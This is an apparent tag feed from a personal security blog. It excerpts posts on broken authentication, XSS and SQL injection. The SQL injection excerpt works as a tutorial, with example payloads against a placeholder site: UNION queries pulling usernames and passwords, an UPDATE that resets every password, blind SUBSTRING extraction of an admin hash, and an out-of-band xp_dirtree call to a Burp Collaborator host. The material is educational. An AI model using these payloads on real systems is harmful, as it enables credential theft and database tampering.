Theory on s4yhii's blog https://blog.s4yhii.com/tags/theory/ Recent content in Theory on s4yhii's blog s4yhii's blog https://blog.s4yhii.com/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E https://blog.s4yhii.com/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E Hugo -- 0.155.3 en-us Tue, 15 Mar 2022 12:00:00 -0400 Broken Authentication https://blog.s4yhii.com/posts/2022-03-15-broken-authentication/ Tue, 15 Mar 2022 12:00:00 -0400 https://blog.s4yhii.com/posts/2022-03-15-broken-authentication/ <p>Authentication is the process of verifying the identity of a given user or client. In other words, it involves making sure that they really are who they claim to be, there are three authentication factors:</p> <ul> <li>Something you <strong>know</strong>, such as password or security question, known as &ldquo;knowledge factors&rdquo;</li> <li>Something you <strong>have</strong>, a physical object like a mobile phone or security token, known as &ldquo;possession factors&rdquo;</li> <li>Something you <strong>are</strong>, for example biometrics or patterns of behavior, known as &ldquo;inherence factors&rdquo;</li> </ul> <p><strong>What is the difference between authentication and authorization?</strong> Authentication is the process of verifying that a user <strong>is who they claim to be</strong>, whereas authorization involves verifying whether a user <strong>is allowed to do something</strong></p> Cross-site scripting (XSS) https://blog.s4yhii.com/posts/2022-02-14-cross-site-scripting-xss/ Mon, 14 Feb 2022 12:00:00 -0400 https://blog.s4yhii.com/posts/2022-02-14-cross-site-scripting-xss/ <p>Cross-site scripting known as XSS is a web vulnerability in which malicious scripts are injected int benign and trusted websites. XSS occur when an attacker send malicious code in any user input fields in a browser to a different end-user.</p> <h2 id="mechanisms">Mechanisms</h2> <p>In an XSS attack the attacker inject script in HTML code so you&rsquo;ll have to know javascript and HTML syntax, wbe uses scripts to control client-side application logic and make the website interactive, for example this script generates <em>Hello!</em> pop-up on the web page:</p> SQL Injection https://blog.s4yhii.com/posts/2022-01-25-sql-injection/ Tue, 25 Jan 2022 12:00:00 -0400 https://blog.s4yhii.com/posts/2022-01-25-sql-injection/ <p>A SQL injection is an attack in which the attacker executes arbitrary SQL commands on an application’s database by supplying malicious input inserted into a SQL statement. This happens when the input used in SQL queries is incorrectly filtered or escaped and can lead to authentication bypass, sensitive data leaks, tampering of the database and RCE in some cases. <img loading="lazy" src="https://raw.githubusercontent.com/s4yhii/s4yhii.github.io/master/assets/images/Portswigger/sqli1.jpg"></p> <h2 id="in-band-classic-sql-injection">In-Band (classic) SQL Injection</h2> <ul> <li>Occurs when the attacker uses the same communication channel to both launch the attack and gather the result of the attack <ul> <li>Retrieved data is presented directly in the web page</li> </ul> </li> <li>Easier to exploit than other categories of SQLi</li> </ul> <h3 id="error-based-sqli">Error-Based SQLi</h3> <ul> <li>Error bases SQLi is an in-band SQLi technique that forces the database to generate an error, giving the attacker information upon which to refine their injection</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www.random.com/app.php?id<span class="o">=</span><span class="err">&#39;</span> </span></span><span class="line"><span class="cl"><span class="c1">#output</span> </span></span><span class="line"><span class="cl"><span class="c1">#You have an error in your SQL syntax, check the manual that corresponds to your MySQL server version...</span> </span></span></code></pre></div><h3 id="union-based-sqli">Union-Based SQLi</h3> <ul> <li>Is an in-band SQLi technique that leverages the UNION SQL operator to combine the results of two queries into a single result set</li> <li>Input:</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="o">#</span><span class="w"> </span><span class="n">retrieving</span><span class="w"> </span><span class="k">data</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">another</span><span class="w"> </span><span class="k">table</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="err">’</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">username</span><span class="p">,</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">users</span><span class="p">;</span><span class="w"> </span><span class="c1">-- </span></span></span><span class="line"><span class="cl"><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="w"> </span><span class="k">update</span><span class="w"> </span><span class="k">all</span><span class="w"> </span><span class="n">passwords</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="k">table</span><span class="w"> </span><span class="k">with</span><span class="w"> </span><span class="n">POST</span><span class="w"> </span><span class="k">method</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">new_password</span><span class="o">=</span><span class="s2">&#34;password12345&#39;;--&#34;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">query</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">UPDATE</span><span class="w"> </span><span class="n">Users</span><span class="w"> </span><span class="k">SET</span><span class="w"> </span><span class="n">Password</span><span class="o">=</span><span class="s1">&#39;password12345&#39;</span><span class="p">;</span><span class="c1">-- WHERE Id = 2; </span></span></span><span class="line"><span class="cl"><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="c1">--- The WHERE clause, which specifies the criteria of the rows that should be updated, is commented out in this query. The database would update all rows in the table, and change all of the passwords in the Users table to password12345. The attacker can now log in as anyone by using that password </span></span></span></code></pre></div><h2 id="inferential-blind-sql-injection">Inferential (Blind) SQL Injection</h2> <ul> <li>SQLi vuln where there is no actual transfer of data via the webapp</li> <li>Just as dangerous as in-band SQLi <ul> <li>Attacker be able to reconstruct the information by sending particular requests and observing the resulting behavior of the DB Server</li> </ul> </li> <li>Takes longer to exploit than in-ban sql injection</li> </ul> <h3 id="boolean-based-sqli">Boolean-based SQLi</h3> <ul> <li>Uses boolean conditions to return a different result depending on whether the query returns a TRUE or FALSE result.</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">select</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Payload</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="p">(</span><span class="k">false</span><span class="p">)</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">2</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">select</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">2</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Payload</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">select</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span></span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">User</span><span class="w"> </span><span class="k">table</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">Administrator</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="n">e3c3889ded99ej29dj9edjdje992</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">SUBSTRING</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">,</span><span class="k">c</span><span class="p">):</span><span class="w"> </span><span class="k">function</span><span class="w"> </span><span class="n">that</span><span class="w"> </span><span class="k">select</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">part</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">string</span><span class="w"> </span><span class="n">a</span><span class="p">:</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">string</span><span class="p">,</span><span class="w"> </span><span class="n">b</span><span class="p">:</span><span class="n">the</span><span class="w"> </span><span class="k">first</span><span class="w"> </span><span class="n">posicion</span><span class="p">,</span><span class="w"> </span><span class="k">c</span><span class="o">=</span><span class="n">how</span><span class="w"> </span><span class="n">many</span><span class="w"> </span><span class="n">chars</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Payload1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">Users</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="o">=</span><span class="s1">&#39;Administrator&#39;</span><span class="p">),</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="s1">&#39;s&#39;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Query</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">select</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">Users</span><span class="w"> </span><span class="k">Where</span><span class="w"> </span><span class="n">Username</span><span class="o">=</span><span class="s1">&#39;Administrator&#39;</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="s1">&#39;s&#39;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="k">result</span><span class="p">:</span><span class="w"> </span><span class="k">nothing</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">returned</span><span class="w"> </span><span class="n">because</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="k">false</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Payload</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">Users</span><span class="w"> </span><span class="k">Where</span><span class="w"> </span><span class="n">Username</span><span class="o">=</span><span class="s1">&#39;Administrator&#39;</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="s1">&#39;e&#39;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Query</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">select</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">Users</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">Username</span><span class="o">=</span><span class="s1">&#39;Administrator&#39;</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="s1">&#39;e&#39;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="k">result</span><span class="p">:</span><span class="w"> </span><span class="n">Returned</span><span class="w"> </span><span class="k">true</span><span class="p">,</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">tile</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">returned</span><span class="w"> </span><span class="n">bc</span><span class="w"> </span><span class="s2">&#34;e&#34;</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="k">first</span><span class="w"> </span><span class="nb">character</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">hashed</span><span class="w"> </span><span class="n">pass</span><span class="w"> </span></span></span></code></pre></div><h3 id="time-based-blind-sqli">Time-based Blind SQLi</h3> <ul> <li>Relies in the database pausing for a specified amount of time, then returning the result, indicating a success SQL query execution</li> <li>Ex: if the first character of the administrator’s hashed pass is an “a”, wait 10 seconds.</li> </ul> <h2 id="out-of-band-oast-sqli">Out-of-band (OAST) SQLi</h2> <ul> <li>Consists of triggering an out-of-band network connection to a system that you control <ul> <li>Not common, uses variety os protocols (DNS,HTTP)</li> </ul> </li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="s1">&#39;; exec master..xp_dirtree &#39;</span><span class="o">//</span><span class="mi">434934839493499</span><span class="p">.</span><span class="n">burpcollabolator</span><span class="p">.</span><span class="n">net</span><span class="o">/</span><span class="n">a</span><span class="s1">&#39;-- </span></span></span></code></pre></div><h2 id="second-order-sqli">Second order SQLi</h2> <p>Second order SQLi happens when applications user input gets stored in the database, then retrieved and used unsafely in a SQL query. For example consider an app that register an user by specifying username and password, and the user submit the following request:</p>